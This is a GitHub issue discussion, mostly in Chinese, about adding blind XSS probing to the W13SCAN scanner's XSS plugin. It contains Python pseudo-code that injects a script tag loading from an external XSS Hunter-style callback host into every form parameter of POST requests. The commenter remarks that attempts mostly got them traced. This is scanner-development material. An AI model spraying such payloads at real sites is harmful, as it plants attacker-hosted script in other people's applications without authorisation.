boy-hack
commented
3 years ago 欢迎提交pr
Open fngoo opened 3 years ago
boy-hack
commented
3 years ago 欢迎提交pr
fngoo
commented
3 years ago https://github.com/hahwul/dalfox/blob/master/pkg/scanning/scan.go#L360 被动扫描的blind xss效果应该会比这种主动的好
在xss插件中针对POST请求只发放载荷, 不处理结果 xss插件后面加的伪代码,不知道可行吗
class W13SCAN(PluginBase):
name = 'XSS语义化探测插件'
def init(self):
self.result = ResultObject(self)
self.result.init_info(self.requests.url, "XSS脚本注入", VulType.XSS)
def audit(self):
parse_params = set(getParamsFromHtml(self.response.text))
resp = self.response.text
params_data = {}
self.init()
iterdatas = []
if self.requests.method == HTTPMETHOD.GET:
parse_params = (parse_params | TOP_RISK_GET_PARAMS) - set(self.requests.params.keys())
for key in parse_params:
params_data[key] = random_str(6)
params_data.update(self.requests.params)
resp = requests.get(self.requests.netloc, params=params_data, headers=self.requests.headers).text
iterdatas = self.generateItemdatas(params_data)
elif self.requests.method == HTTPMETHOD.POST:
parse_params = (parse_params) - set(self.requests.post_data.keys())
for key in parse_params:
params_data[key] = random_str(6)
params_data.update(self.requests.post_data)
resp = requests.post(self.requests.url, data=params_data, headers=self.requests.headers).text
iterdatas = self.generateItemdatas(params_data)
#blind xss
if blind_xss_arg:
for blind_key in parse_params:
params_data[blind_key] = '"><script src=https://xsshunterurlforexample.xss.ht></script>'
params_data.update(self.requests.post_data)
noresp = requests.post(self.requests.url, data=params_data, headers=self.requests.headers).text
#blind xss这样我试过,成功率有一点,更多的是被溯源。。
-b, --blind string Add your blind xss (e.g -b xss.com)